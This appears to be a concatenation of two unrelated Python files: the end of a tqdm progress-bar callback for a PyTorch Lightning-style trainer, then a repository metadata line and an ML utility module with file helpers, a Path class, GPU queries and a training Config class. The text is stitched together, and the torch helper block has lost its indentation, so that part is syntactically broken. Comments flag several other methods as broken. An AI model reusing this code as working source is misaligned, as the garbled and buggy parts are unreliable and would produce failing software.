        return self._process_position
    @property
    def is_enabled(self) -> bool:
        # refresh_rate == 0 also disables display entirely
        return self._enabled and self.refresh_rate > 0
    @property
    def is_disabled(self) -> bool:
        return not self.is_enabled
    @property
    def _val_processed(self) -> int:
        if self.trainer.state.fn == "fit":
            # use total in case validation runs more than once per training epoch
            return self.trainer.fit_loop.epoch_loop.val_loop.epoch_loop.batch_progress.total.processed
        return self.trainer.validate_loop.epoch_loop.batch_progress.current.processed
    def disable(self) -> None:
        self._enabled = False
    def enable(self) -> None:
        self._enabled = True
    def init_sanity_tqdm(self) -> Tqdm:
        """Override this to customize the tqdm bar for the validation sanity run."""
        bar = Tqdm(
            desc="Validation sanity check",
            position=(2 * self.process_position),
            disable=self.is_disabled,
            leave=False,
            dynamic_ncols=True,
            file=sys.stdout,
        )
        return bar
    def init_train_tqdm(self) -> Tqdm:
        """Override this to customize the tqdm bar for training."""
        bar = Tqdm(
            desc="Training",
            initial=self.train_batch_idx,
            position=(2 * self.process_position),
            disable=self.is_disabled,
            leave=True,
            dynamic_ncols=True,
            file=sys.stdout,
            smoothing=0,
        )
        return bar
    def init_predict_tqdm(self) -> Tqdm:
        """Override this to customize the tqdm bar for predicting."""
        bar = Tqdm(
            desc="Predicting",
            initial=self.train_batch_idx,
            position=(2 * self.process_position),
            disable=self.is_disabled,
            leave=True,
            dynamic_ncols=True,
            file=sys.stdout,
            smoothing=0,
        )
        return bar
    def init_validation_tqdm(self) -> Tqdm:
        """Override this to customize the tqdm bar for validation."""
        # The main progress bar doesn't exist in `trainer.validate()`
        has_main_bar = self.trainer.state.fn != "validate"
        bar = Tqdm(
            desc="Validating",
            position=(2 * self.process_position + has_main_bar),
            disable=self.is_disabled,
            leave=not has_main_bar,
            dynamic_ncols=True,
            file=sys.stdout,
        )
        return bar
    def init_test_tqdm(self) -> Tqdm:
        """Override this to customize the tqdm bar for testing."""
        bar = Tqdm(
            desc="Testing",
            position=(2 * self.process_position),
            disable=self.is_disabled,
            leave=True,
            dynamic_ncols=True,
            file=sys.stdout,
        )
        return bar
    def on_sanity_check_start(self, *_: Any) -> None:
        self.val_progress_bar = self.init_sanity_tqdm()
        self.main_progress_bar = Tqdm(disable=True)  # dummy progress bar
    def on_sanity_check_end(self, *_: Any) -> None:
        self.main_progress_bar.close()
        self.val_progress_bar.close()
    def on_train_start(self, *_: Any) -> None:
        self.main_progress_bar = self.init_train_tqdm()
    def on_train_epoch_start(self, trainer: "pl.Trainer", *_: Any) -> None:
        total_train_batches = self.total_train_batches
        total_val_batches = self.total_val_batches
        if total_train_batches != float("inf") and total_val_batches != float("inf"):
            # val can be checked multiple times per epoch
            val_checks_per_epoch = total_train_batches // trainer.val_check_batch
            total_val_batches = total_val_batches * val_checks_per_epoch
        # the main bar counts training AND validation batches together
        total_batches = total_train_batches + total_val_batches
        self.main_progress_bar.total = convert_inf(total_batches)
        self.main_progress_bar.set_description(f"Epoch {trainer.current_epoch}")
    def on_train_batch_end(self, trainer: "pl.Trainer", pl_module: "pl.LightningModule", *_: Any) -> None:
        if self._should_update(self.train_batch_idx):
            _update_n(self.main_progress_bar, self.train_batch_idx + self._val_processed)
            self.main_progress_bar.set_postfix(self.get_metrics(trainer, pl_module))
    def on_train_epoch_end(self, trainer: "pl.Trainer", pl_module: "pl.LightningModule") -> None:
        _update_n(self.main_progress_bar, self.train_batch_idx + self._val_processed)
        if not self.main_progress_bar.disable:
            self.main_progress_bar.set_postfix(self.get_metrics(trainer, pl_module))
    def on_train_end(self, *_: Any) -> None:
        self.main_progress_bar.close()
    def on_validation_start(self, trainer: "pl.Trainer", *_: Any) -> None:
        if trainer.sanity_checking:
            self.val_progress_bar.total = sum(trainer.num_sanity_val_batches)
        else:
            self.val_progress_bar = self.init_validation_tqdm()
            self.val_progress_bar.total = convert_inf(self.total_val_batches)
    def on_validation_batch_end(self, trainer: "pl.Trainer", *_: Any) -> None:
        if self._should_update(self.val_batch_idx):
            _update_n(self.val_progress_bar, self.val_batch_idx)
            # keep the combined main bar in sync while validating mid-fit
            if trainer.state.fn == "fit":
                _update_n(self.main_progress_bar, self.train_batch_idx + self._val_processed)
    def on_validation_epoch_end(self, *_: Any) -> None:
        _update_n(self.val_progress_bar, self._val_processed)
    def on_validation_end(self, trainer: "pl.Trainer", pl_module: "pl.LightningModule") -> None:
        if self._main_progress_bar is not None and trainer.state.fn == "fit":
            self.main_progress_bar.set_postfix(self.get_metrics(trainer, pl_module))
        self.val_progress_bar.close()
    def on_test_start(self, *_: Any) -> None:
        self.test_progress_bar = self.init_test_tqdm()
        self.test_progress_bar.total = convert_inf(self.total_test_batches)
    def on_test_batch_end(self, *_: Any) -> None:
        if self._should_update(self.test_batch_idx):
            _update_n(self.test_progress_bar, self.test_batch_idx)
    def on_test_epoch_end(self, *_: Any) -> None:
        _update_n(self.test_progress_bar, self.test_batch_idx)
    def on_test_end(self, *_: Any) -> None:
        self.test_progress_bar.close()
    def on_predict_epoch_start(self, *_: Any) -> None:
        self.predict_progress_bar = self.init_predict_tqdm()
        self.predict_progress_bar.total = convert_inf(self.total_predict_batches)
    def on_predict_batch_end(self, *_: Any) -> None:
        if self._should_update(self.predict_batch_idx):
            _update_n(self.predict_progress_bar, self.predict_batch_idx)
    def on_predict_end(self, *_: Any) -> None:
        self.predict_progress_bar.close()
    def print(self, *args: Any, sep: str = " ", **kwargs: Any) -> None:
        """Print through whichever bar is active so the output does not clobber it."""
        active_progress_bar = None
        if self._main_progress_bar is not None and not self.main_progress_bar.disable:
            active_progress_bar = self.main_progress_bar
        elif self._val_progress_bar is not None and not self.val_progress_bar.disable:
            active_progress_bar = self.val_progress_bar
        elif self._test_progress_bar is not None and not self.test_progress_bar.disable:
            active_progress_bar = self.test_progress_bar
        elif self._predict_progress_bar is not None and not self.predict_progress_bar.disable:
            active_progress_bar = self.predict_progress_bar
        if active_progress_bar is not None:
            s = sep.join(map(str, args))
            active_progress_bar.write(s, **kwargs)
    def _should_update(self, idx: int) -> bool:
        # refresh every `refresh_rate` batches (and never when the rate is 0)
        return self.refresh_rate > 0 and idx % self.refresh_rate == 0
    @staticmethod
    def _resolve_refresh_rate(refresh_rate: int) -> int:
        if os.getenv("COLAB_GPU") and refresh_rate == 1:
            # smaller refresh rate on colab causes crashes, choose a higher value
            rank_zero_debug("Using a higher refresh rate on Colab. Setting it to `20`")
            refresh_rate = 20
        return refresh_rate
def convert_inf(x: Optional[Union[int, float]]) -> Optional[Union[int, float]]:
    """Map ``inf``/``nan`` (which tqdm cannot render) and ``None`` to ``None``."""
    if x is not None and math.isfinite(x):
        return x
    return None
def _update_n(bar: _tqdm, value: int) -> None:
    """Assign ``value`` to the bar's counter and force a redraw (no-op when disabled)."""
    if bar.disable:
        return
    bar.n = value
    bar.refresh()
9e9b63d345e85d99d6fdf0d277eed09225a85993 | 28,944 | py | Python | u.py | mit-han-lab/neurips-micronet | a85bd0ed719b5d6f45642d71f5b83a8eed916025 | [
"MIT"
] | 37 | 2019-11-08T02:11:47.000Z | 2022-02-11T00:55:15.000Z | u.py | mit-han-lab/neurips-micronet | a85bd0ed719b5d6f45642d71f5b83a8eed916025 | [
"MIT"
] | 3 | 2020-02-15T10:56:24.000Z | 2021-03-31T03:40:36.000Z | u.py | mit-han-lab/neurips-micronet | a85bd0ed719b5d6f45642d71f5b83a8eed916025 | [
"MIT"
] | 7 | 2020-01-13T06:20:43.000Z | 2022-02-11T00:55:18.000Z | ### Common global imports ###
from __future__ import absolute_import, print_function
import subprocess, sys, os, re, tempfile, zipfile, gzip, io, shutil, string, random, itertools, pickle, json, yaml, gc
from datetime import datetime
from time import time
from fnmatch import fnmatch
from glob import glob
from tqdm import tqdm
from collections import defaultdict, Counter, OrderedDict
import warnings
warnings.filterwarnings('ignore')
from io import StringIO
### Util methods ###
def get_encoder(decoder):
    """Invert a decoder sequence (index -> symbol) into a symbol -> index dict."""
    return {symbol: index for index, symbol in enumerate(decoder)}
def load_json(path):
    """Load and return the JSON document stored at ``path``.

    Opens the file read-only; the previous ``'r+'`` mode needlessly required
    write permission (and failed on read-only files) just to read.
    """
    with open(path, 'r') as f:
        return json.load(f)
def save_json(path, dict_):
    """Write ``dict_`` to ``path`` as pretty-printed JSON with sorted keys."""
    with open(path, 'w+') as out:
        json.dump(dict_, out, indent=4, sort_keys=True)
def format_json(dict_):
    """Return ``dict_`` rendered as pretty-printed JSON text with sorted keys."""
    return json.dumps(dict_, sort_keys=True, indent=4)
def format_yaml(dict_):
    """Render a (possibly nested) mapping as YAML, flattening Path objects to str."""

    def plain(x):
        if type(x) is Path:
            return x._
        if type(x) is dict:
            return dict(x)
        return x

    return yaml.dump(recurse(dict_, plain))
def load_text(path, encoding='utf-8'):
    """Read and return the whole text file at ``path``."""
    with open(path, 'r', encoding=encoding) as fh:
        return fh.read()
def save_text(path, string):
    """Overwrite ``path`` with ``string``."""
    with open(path, 'w') as fh:
        fh.write(string)
def load_pickle(path):
    """Unpickle and return the object stored at ``path``."""
    with open(path, 'rb') as fh:
        return pickle.load(fh)
def save_pickle(path, obj):
    """Pickle ``obj`` to ``path`` (overwriting any existing file)."""
    with open(path, 'wb') as fh:
        pickle.dump(obj, fh)
def wget(link, output_dir):
    """Download ``link`` into ``output_dir`` using the system ``wget`` binary.

    Returns the Path of the downloaded file; raises RuntimeError if the
    expected output file does not appear.
    """
    # bug fix: the command previously interpolated the undefined name ``path``
    # instead of ``link``, raising NameError on every call
    cmd = 'wget %s -P %s' % (link, output_dir)
    shell(cmd)
    output_path = Path(output_dir) / os.path.basename(link)
    if not output_path.exists(): raise RuntimeError('Failed to run %s' % cmd)
    return output_path
def extract(input_path, output_path=None):
    """Decompress ``input_path`` (only ``.gz`` is supported) to ``output_path``.

    When ``output_path`` is falsy it defaults to the input path with the
    ``.gz`` suffix stripped.
    """
    if input_path[-3:] != '.gz':
        raise RuntimeError('Don\'t know file extension for ' + input_path)
    if not output_path:
        output_path = input_path[:-3]
    with gzip.open(input_path, 'rb') as src, open(output_path, 'wb') as dst:
        dst.write(src.read())
def shell(cmd, wait=True, ignore_error=2):
    """Run ``cmd`` through the shell.

    Args:
        cmd: a command string, or a sequence of arguments joined with spaces.
        wait: when False, return the Popen object immediately.
        ignore_error: unused; kept for backward compatibility with callers.

    Returns:
        The Popen object when ``wait`` is False, otherwise a
        ``(stdout, stderr)`` pair of decoded strings (stderr may be None).
    """
    # bug fix: the old ``type(cmd) != str`` check mis-handled str subclasses
    # (e.g. this module's Path), joining their *characters* with spaces
    if not isinstance(cmd, str):
        cmd = ' '.join(cmd)
    # NOTE(review): shell=True executes via the shell — only pass trusted input
    process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    if not wait:
        return process
    out, err = process.communicate()
    return out.decode(), err.decode() if err else None
def attributes(obj):
    """Pretty-print ``obj``'s non-callable members as (name, value) pairs."""
    import inspect
    import pprint
    members = inspect.getmembers(obj, lambda a: not inspect.isroutine(a))
    pprint.pprint(members)
def import_module(module_name, module_path):
    """Load the Python source file at ``module_path`` as module ``module_name``.

    Re-implemented with ``importlib`` because the ``imp`` module this used is
    deprecated since Python 3.4 and removed in 3.12. Unlike ``imp.load_source``
    this does not register the module in ``sys.modules``.
    """
    import importlib.util
    spec = importlib.util.spec_from_file_location(module_name, module_path)
    module = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(module)
    return module
_log_path = None
def logger(directory=None):
    """Initialise the module-wide log file (at most once) and return ``log``.

    The first call that supplies ``directory`` creates a timestamped ``.log``
    path under it; later calls are no-ops and simply return the ``log``
    function.
    """
    global _log_path
    if directory and not _log_path:
        from datetime import datetime
        stamp = datetime.now().isoformat().replace(':', '_').rsplit('.')[0]
        _log_path = Path(directory) / stamp + '.log'
    return log
def log(text):
    """Print ``text`` and, when a log file has been configured, append it there."""
    print(text)
    if not _log_path:
        return
    with open(_log_path, 'a') as fh:
        fh.write(text + '\n')
class Path(str):
    """A ``str`` subclass with filesystem helpers.

    Supports joining with ``/`` (``//`` downcasts back to plain str), listing,
    create/remove/move/copy/link operations, relative paths, and typed
    load/save helpers dispatched by file extension.

    Because it subclasses ``str``, a Path can be passed anywhere a plain path
    string is expected.
    """
    def __init__(self, path):
        pass
    def __add__(self, subpath):
        return Path(str(self) + str(subpath))
    def __truediv__(self, subpath):
        return Path(os.path.join(str(self), str(subpath)))
    def __floordiv__(self, subpath):
        # join, then downcast to a plain str
        return (self / subpath)._
    def ls(self, show_hidden=True, dir_only=False, file_only=False):
        """Return (subdirs, files) under this directory, or just one list."""
        subpaths = [Path(self / subpath) for subpath in os.listdir(self) if show_hidden or not subpath.startswith('.')]
        isdirs = [os.path.isdir(subpath) for subpath in subpaths]
        subdirs = [subpath for subpath, isdir in zip(subpaths, isdirs) if isdir]
        files = [subpath for subpath, isdir in zip(subpaths, isdirs) if not isdir]
        if dir_only:
            return subdirs
        if file_only:
            return files
        return subdirs, files
    def recurse(self, dir_fn=None, file_fn=None):
        """Depth-first walk, applying dir_fn to directories and file_fn to files."""
        if dir_fn is not None:
            dir_fn(self)
        dirs, files = self.ls()
        if file_fn is not None:
            list(map(file_fn, files))
        for dir in dirs:
            dir.recurse(dir_fn=dir_fn, file_fn=file_fn)
    def mk(self):
        """Create this directory (and parents) if needed; returns self."""
        os.makedirs(self, exist_ok=True)
        return self
    def rm(self):
        """Remove this file/link/directory tree; returns self."""
        if self.isfile() or self.islink():
            os.remove(self)
        elif self.isdir():
            shutil.rmtree(self)
        return self
    def mv(self, dest):
        shutil.move(self, dest)
    def mv_from(self, src):
        shutil.move(src, self)
    def cp(self, dest):
        shutil.copy(self, dest)
    def cp_from(self, src):
        shutil.copy(src, self)
    def link(self, target, force=False):
        """Create a symlink at this path pointing to ``target``."""
        if self.exists():
            if not force:
                return
            else:
                self.rm()
        os.symlink(target, self)
    def exists(self):
        return os.path.exists(self)
    def isfile(self):
        return os.path.isfile(self)
    def isdir(self):
        return os.path.isdir(self)
    def islink(self):
        return os.path.islink(self)
    def rel(self, start=None):
        return Path(os.path.relpath(self, start=start))
    def clone(self):
        """Return the first non-existing sibling named ``<self>__<i>``."""
        name = self._name
        match = re.search('__([0-9]+)$', name)
        if match is None:
            base = self + '__'
            i = 1
        else:
            initial = match.group(1)
            base = self[:-len(initial)]
            i = int(initial) + 1
        while True:
            path = Path(base + str(i))
            if not path.exists():
                return path
            i += 1
    @property
    def _(self):
        # plain-str view of this path
        return str(self)
    @property
    def _real(self):
        return Path(os.path.realpath(self))
    @property
    def _up(self):
        # parent directory; falls back to the realpath's parent for bare names
        path = os.path.dirname(self)
        # bug fix: was ``path is ''`` — identity comparison with a str literal
        # (SyntaxWarning in modern Python and implementation-dependent)
        if path == '':
            path = os.path.dirname(self._real)
        return Path(path)
    @property
    def _name(self):
        return os.path.basename(self)
    @property
    def _ext(self):
        frags = self._name.rsplit('.', 1)
        if len(frags) == 1:
            return ''
        return frags[1]
    # extension-specific helpers bound from the module-level functions
    extract = extract
    load_json = load_json
    save_json = save_json
    load_txt = load_text
    save_txt = save_text
    load_p = load_pickle
    save_p = save_pickle
    def load_csv(self, index_col=0, **kwargs):
        return pd.read_csv(self, index_col=index_col, **kwargs)
    def save_csv(self, df, float_format='%.5g', **kwargs):
        df.to_csv(self, float_format=float_format, **kwargs)
    def load_npy(self):
        return np.load(self, allow_pickle=True)
    def save_npy(self, obj):
        np.save(self, obj)
    def load_yaml(self):
        with open(self, 'r') as f:
            return yaml.safe_load(f)
    def save_yaml(self, obj):
        obj = recurse(obj, lambda x: x._ if type(x) is Path else dict(x) if type(x) is dict else x)
        with open(self, 'w') as f:
            yaml.dump(obj, f, default_flow_style=False, allow_unicode=True)
    def load(self):
        # dispatch on extension; NOTE(review): eval on self-derived method name
        return eval('self.load_%s' % self._ext)()
    def save(self, obj):
        return eval('self.save_%s' % self._ext)(obj)
    def wget(self, link):
        """Download ``link`` into this directory (must be an existing dir)."""
        if self.isdir():
            return Path(wget(link, self))
        raise ValueError('Path %s needs to be a directory' % self)
class Namespace(object):
    """A mutable attribute bag.

    Positional ``str`` arguments become flag attributes set to True; dict
    arguments and keyword arguments are merged in as attribute/value pairs.
    All mutators return ``self`` for chaining.
    """

    def __init__(self, *args, **kwargs):
        self.var(*args, **kwargs)

    def var(self, *args, **kwargs):
        """Set attributes from flags, dicts, and keyword arguments."""
        updates = {}
        for arg in args:
            if type(arg) is str:
                updates[arg] = True
            else:  # assume a mapping of attribute -> value
                updates.update(arg)
        updates.update(kwargs)
        self.__dict__.update(updates)
        return self

    def unvar(self, *args):
        """Delete the named attributes."""
        for name in args:
            self.__dict__.pop(name)
        return self

    def get(self, key, default=None):
        """dict-style attribute lookup with a default."""
        return self.__dict__.get(key, default)

    def setdefault(self, *args, **kwargs):
        """Like ``var``, but only for names that are not already set."""
        missing_args = [a for a in args if a not in self.__dict__]
        missing_kwargs = {k: v for k, v in kwargs.items() if k not in self.__dict__}
        return self.var(*missing_args, **missing_kwargs)
##### Functions for compute
# Detect whether we are running under IPython/Jupyter: get_ipython() only
# exists there. Used below to pick a matplotlib backend.
using_ipython = True
try:
    _ = get_ipython().__class__.__name__
except NameError:
    using_ipython = False
# Optional scientific stack; silently unavailable when not installed.
try:
    import numpy as np
    import pandas as pd
    import scipy.stats
    import scipy as sp
    from scipy.stats import pearsonr as pearson, spearmanr as spearman, kendalltau
    if not using_ipython:
        import matplotlib
        matplotlib.use('Agg')  # headless backend outside notebooks
    import matplotlib.pyplot as plt
    def _sel(self, col, value):
        # select rows where ``col`` equals ``value`` (or is in it, for a list)
        if type(value) == list:
            return self[self[col].isin(value)]
        return self[self[col] == value]
    pd.DataFrame.sel = _sel  # monkey-patch convenience selector onto DataFrame
except ImportError:
    pass
# Optional sklearn metric aliases.
try:
    from sklearn.metrics import roc_auc_score as auroc, average_precision_score as auprc, roc_curve as roc, precision_recall_curve as prc, accuracy_score as accuracy
except ImportError:
    pass
def recurse(x, fn):
    """Apply ``fn`` to every leaf of a nested dict/list/tuple structure.

    Containers (dict, OrderedDict, list, tuple — matched by exact type) are
    rebuilt with the same type; anything else is a leaf mapped through ``fn``.
    """
    container = type(x)
    if container in (dict, OrderedDict):
        return container((key, recurse(val, fn)) for key, val in x.items())
    if container in (list, tuple):
        return container(recurse(item, fn) for item in x)
    return fn(x)
def from_numpy(x):
    """Recursively convert numpy values inside ``x`` to plain Python objects.

    ndarrays become (nested) lists, numpy scalars become Python scalars;
    everything else is passed through unchanged.
    """
    def helper(x):
        if type(x).__module__ == np.__name__:
            if type(x) == np.ndarray:
                return recurse(list(x), helper)
            # np.asscalar was removed in NumPy 1.23; .item() is the
            # supported equivalent
            return x.item()
        return x
    return recurse(x, helper)
def smooth(y, box_pts):
    """Smooth ``y`` with a centered moving average (box filter) of width ``box_pts``."""
    kernel = np.full(box_pts, 1.0 / box_pts)
    return np.convolve(y, kernel, mode='same')
def get_gpu_info(ssh_fn=lambda x: x):
    """Query nvidia-smi and return a per-GPU DataFrame of memory/utilization.

    Respects CUDA_VISIBLE_DEVICES by restricting rows to the visible GPUs
    and renumbering their indices from zero. *ssh_fn* may wrap the command
    to run it on a remote host.
    """
    query = 'nvidia-smi --query-gpu=index,name,memory.used,memory.total,utilization.gpu --format=csv,nounits'
    raw, _ = shell(ssh_fn(query))
    # '[Not Supported]' appears for some GPUs; treat them as fully utilized
    raw = raw.replace('[Not Supported]', '100').replace(', ', ',')
    gpu_df = pd.read_csv(StringIO(raw), index_col=0)
    visible = os.environ.get('CUDA_VISIBLE_DEVICES')
    if visible:
        ids = list(map(int, visible.split(',')))
        gpu_df = gpu_df.loc[ids]
        gpu_df.index = gpu_df.index.map({gpu: pos for pos, gpu in enumerate(ids)})
    info = pd.DataFrame(index=gpu_df.index)
    info['memory_total'] = gpu_df['memory.total [MiB]']
    info['memory_used'] = gpu_df['memory.used [MiB]']
    info['memory_free'] = info['memory_total'] - info['memory_used']
    info['utilization'] = gpu_df['utilization.gpu [%]'] / 100
    info['utilization_free'] = 1 - info['utilization']
    return info
def get_process_gpu_info(pid=None, ssh_fn=lambda x: x):
    """Return nvidia-smi per-process GPU usage, optionally for one pid.

    pid=None returns the whole table; pid=-1 selects the current process.
    """
    raw, _ = shell(ssh_fn('nvidia-smi --query-compute-apps=pid,gpu_name,used_gpu_memory --format=csv,nounits'))
    table = pd.read_csv(StringIO(raw.replace(', ', ',')), index_col=0)
    if pid is None:
        return table
    if pid == -1:
        pid = os.getpid()
    return table.loc[pid]
##### torch functions
try:
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
def to_torch(x, device='cuda'):
def helper(x):
if x is None:
return None
elif type(x) == torch.Tensor:
return x.to(device)
elif type(x) in [str, bool, int, float]:
return x
return torch.from_numpy(x).to(device)
return recurse(x, helper)
def from_torch(t):
def helper(t):
if type(t) != torch.Tensor:
return t
x = t.detach().cpu().numpy()
if x.size == 1 or np.isscalar(x):
return np.asscalar(x)
return x
return recurse(t, helper)
def count_params(network, requires_grad=False):
return sum(p.numel() for p in network.parameters() if not requires_grad or p.requires_grad)
def report_memory(device=None, max=False):
if device:
device = torch.device(device)
if max:
alloc = torch.cuda.max_memory_allocated(device=device)
else:
alloc = torch.cuda.memory_allocated(device=device)
alloc /= 1024 ** 2
print('%.3f MBs' % alloc)
return alloc
numels = Counter()
for obj in gc.get_objects():
if torch.is_tensor(obj):
print(type(obj), obj.size())
numels[obj.device] += obj.numel()
print()
for device, numel in sorted(numels.items()):
print('%s: %s elements, %.3f MBs' % (str(device), numel, numel * 4 / 1024 ** 2))
def clear_gpu_memory():
gc.collect()
torch.cuda.empty_cache()
for obj in gc.get_objects():
if torch.is_tensor(obj):
obj.cpu()
gc.collect()
torch.cuda.empty_cache()
except ImportError:
pass
try:
from apex import amp
except ImportError:
pass
def main_only(method):
    """Decorator: run *method* only when self.main is truthy (the rank-0 /
    main process); on other processes the call is skipped and None returned.
    """
    from functools import wraps

    @wraps(method)  # preserve the wrapped method's name/docstring for logs
    def wrapper(self, *args, **kwargs):
        if self.main:
            return method(self, *args, **kwargs)
    return wrapper
class Config(Namespace):
    """Experiment configuration rooted at a result directory.

    Persists its (non-transient) attributes to <res>/config.yaml, and owns
    the training loop bookkeeping: logging, model checkpointing under
    <res>/models, early stopping, tensorboard writing and (optionally)
    distributed / mixed-precision setup.
    """
    def __init__(self, res, *args, **kwargs):
        self.res = Path(res)._real
        super(Config, self).__init__(*args, **kwargs)
        self.setdefault(
            name=self.res._real._name,
            main=True,
            logger=True,
            device='cuda',
            debug=False,
            opt_level='O0'
        )
    def __repr__(self):
        return format_yaml(vars(self))
    def __hash__(self):
        return hash(repr(self))
    @property
    def path(self):
        # YAML file named after the (sub)class, e.g. config.yaml
        return self.res / (type(self).__name__.lower() + '.yaml')
    def load(self):
        """Load saved attributes from the YAML file, if it exists."""
        if self.path.exists():
            for k, v in self.path.load().items():
                setattr(self, k, v)
        return self
    # Transient attributes that are never written to the YAML file.
    never_save = {'res', 'name', 'main', 'logger', 'distributed', 'parallel', 'device', 'debug'}
    @property
    def attrs_save(self):
        return {k: v for k, v in vars(self).items() if k not in self.never_save}
    def save(self, force=False):
        if force or not self.path.exists():
            self.res.mk()
            self.path.save(from_numpy(self.attrs_save))
        return self
    def clone(self):
        # NOTE(review): _clone() is not defined on this class — this line
        # raises AttributeError when reached; probably meant self.clone_().
        return self._clone().save()
    def clone_(self):
        return self.cp_(self.res._real.clone())
    def cp(self, path, *args, **kwargs):
        return self.cp_(path, *args, **kwargs).save()
    def cp_(self, path, *args, **kwargs):
        '''
        path: should be absolute or relative to self.res._up
        '''
        attrs = self.attrs_save
        for a in args:
            kwargs[a] = True
        # Drop overrides that match the current value so the copy stays minimal.
        kwargs = {k: v for k, v in kwargs.items() if v != attrs.get(k)}
        merged = attrs.copy()
        merged.update(kwargs)
        if os.path.isabs(path):
            new_res = path
        else:
            new_res = self.res._up / path
        return Config(new_res).var(**merged)
    @classmethod
    def from_args(cls):
        """Build a Config from command-line arguments: `res [key=value ...]`."""
        import argparse
        parser = argparse.ArgumentParser(description='Model arguments')
        parser.add_argument('res', type=Path, help='Result directory')
        parser.add_argument('kwargs', nargs='*', help='Extra arguments that goes into the config')
        args = parser.parse_args()
        kwargs = {}
        for kv in args.kwargs:
            splits = kv.split('=')
            if len(splits) == 1:
                v = True
            else:
                v = splits[1]
                # NOTE: eval() on command-line values — only acceptable for
                # trusted, locally supplied arguments.
                try:
                    v = eval(v)
                except (SyntaxError, NameError):
                    pass
            kwargs[splits[0]] = v
        return cls(args.res).load().var(**kwargs).save()
    @classmethod
    def clean(cls, *directories):
        # NOTE(review): 'self' is undefined inside this classmethod (only
        # `cls` exists) and `load_all` is not defined in this class —
        # this method raises NameError/AttributeError when called. TODO fix.
        configs = cls.load_all(*directories)
        for config in configs:
            if not (config.train_results.exists() or len(config.models.ls()[1]) > 0):
                config.res.rm()
                self.log('Removed %s' % config.res)
    @main_only
    def log(self, text):
        logger(self.res if self.logger else None)(text)
    def on_train_start(self, s):
        """Initialize training state namespace *s* and guard against double runs."""
        step = s.step
        s.step_max = self.steps
        self.setdefault(
            step_save=np.inf,
            time_save=np.inf,
            patience=np.inf,
            step_print=1,
        )
        s.var(
            step_max=self.steps,
            last_save_time=time(),
            record_step=False,
            last_record_step=step,
            last_record_state=None,
            results=self.load_train_results()
        )
        if self.main and self.training.exists():
            self.log('Quitting because another training is found')
            exit()
        self.set_training(True)
        import signal
        # Flush state cleanly if the run is interrupted with Ctrl-C.
        def handler(signum, frame):
            self.on_train_end(s)
            exit()
        s.prev_handler = signal.signal(signal.SIGINT, handler)
        s.writer = None
        if self.main and self.get('use_tb', True):
            from torch.utils.tensorboard import SummaryWriter
            s.writer = SummaryWriter(log_dir=self.res, flush_secs=10)
        if self.stopped_early.exists():
            self.log('Quitting at step %s because already stopped early before' % step)
            s.step_max = step
            return
        self.log(str(self))
        self.log('Network has %s parameters' % count_params(s.net))
        s.progress = None
        if self.main:
            self.log('Training %s from step %s to step %s' % (self.name, step, s.step_max))
            s.progress = iter(RangeProgress(step, s.step_max, desc=self.name))
    def on_step_end(self, s):
        """Record step results, checkpoint/early-stop/log as configured."""
        step = s.step
        results = s.results
        step_result = s.step_result
        if results is None:
            s.results = results = pd.DataFrame(columns=step_result.index, index=pd.Series(name='step'))
        prev_time = 0
        if len(results):
            last_step = results.index[-1]
            # Extrapolate previous cumulative time proportionally to steps.
            prev_time = (step - 1) / last_step * results.loc[last_step, 'total_train_time']
        tot_time = step_result['total_train_time'] = prev_time + step_result['train_time']
        if step_result.index.isin(results.columns).all():
            results.loc[step] = step_result
        else:
            step_result.name = step
            # NOTE(review): DataFrame.append was removed in pandas 2.0; this
            # needs pd.concat([results, step_result.to_frame().T]) there.
            s.results = results = results.append(step_result)
        if s.record_step:
            s.last_record_step = step
            s.last_record_state = self.get_state(s.net, s.opt, step)
            self.log('Recorded state at step %s' % step)
            s.record_step = False
        if step - s.last_record_step > self.patience:
            self.set_stopped_early()
            self.log('Stopped early after %s / %s steps' % (step, s.step_max))
            s.step_max = step
            return
        if s.writer:
            for k, v in step_result.items():
                if 'time' in k:
                    v /= 60.0 # convert seconds to minutes
                s.writer.add_scalar(k, v, global_step=step, walltime=tot_time)
        if step % self.step_save == 0 or time() - s.last_save_time >= self.time_save:
            self.save_train_results(results)
            self.save_state(step, self.get_state(s.net, s.opt, step), link_best=False)
            s.last_save_time = time()
        if step % self.step_print == 0:
            self.log(' | '.join([
                'step {:3d}'.format(step),
                '{:4.2f} mins'.format(step_result['total_train_time'] / 60),
                *('{} {:10.5g}'.format(k, v) for k, v in zip(step_result.index, step_result)
                    if k != 'total_train_time')
            ]))
            if s.progress: next(s.progress)
            sys.stdout.flush()
    def on_train_end(self, s):
        """Flush results, save final/recorded checkpoints and restore signals."""
        step = s.step
        if s.results is not None:
            self.save_train_results(s.results)
            s.results = None
        if s.last_record_state:
            if not self.model_save(s.last_record_step).exists():
                save_path = self.save_state(s.last_record_step, s.last_record_state, link_best=True)
            s.last_record_state = None
        # Save latest model
        if step > 0 and not self.model_save(step).exists():
            save_path = self.save_state(step, self.get_state(s.net, s.opt, step))
        if s.progress: s.progress.close()
        if s.writer: s.writer.close()
        self.set_training(False)
        import signal
        signal.signal(signal.SIGINT, s.prev_handler)
    def train(self, steps=1000000, cd=True, gpu=True, env_gpu=True, opt='O0', log=True):
        """Build (not run) the shell command line that launches training."""
        cd = ('cd %s\n' % self.res) if cd else ''
        cmd = []
        if env_gpu is False or env_gpu is None:
            cmd.append('CUDA_VISIBLE_DEVICES=')
            n_gpu = 0
        elif type(env_gpu) is int:
            cmd.append('CUDA_VISIBLE_DEVICES=%s' % env_gpu)
            n_gpu = 1
        elif type(env_gpu) in [list, tuple]:
            cmd.append('CUDA_VISIBLE_DEVICES=%s' % ','.join(map(str, env_gpu)))
            n_gpu = len(env_gpu)
        else:
            # env_gpu=True: assume 4 GPUs — TODO confirm this default
            n_gpu = 4
        cmd.append('python3')
        if n_gpu > 1:
            cmd.append(
                '-m torch.distributed.launch --nproc_per_node=%s --use_env' % n_gpu
            )
        cmd.extend([
            Path(self.model).rel(self.res),
            '.',
            'steps=%s' % steps,
            'opt_level=%s' % opt
        ])
        if gpu is False or gpu is None:
            cmd.append('device=cpu')
        elif type(gpu) is int:
            cmd.append('device=cuda:%s' % gpu)
        return cd + ' '.join(cmd)
    def init_model(self, net, opt=None, step='max', train=True):
        """Move *net* to the configured device, restore state, and wrap it for
        data/distributed parallelism and (optionally) apex mixed precision.

        Returns (net, opt, step) when train=True, else (net, step).
        """
        if train:
            assert not self.training.exists(), 'Training already exists'
        # configure parallel training
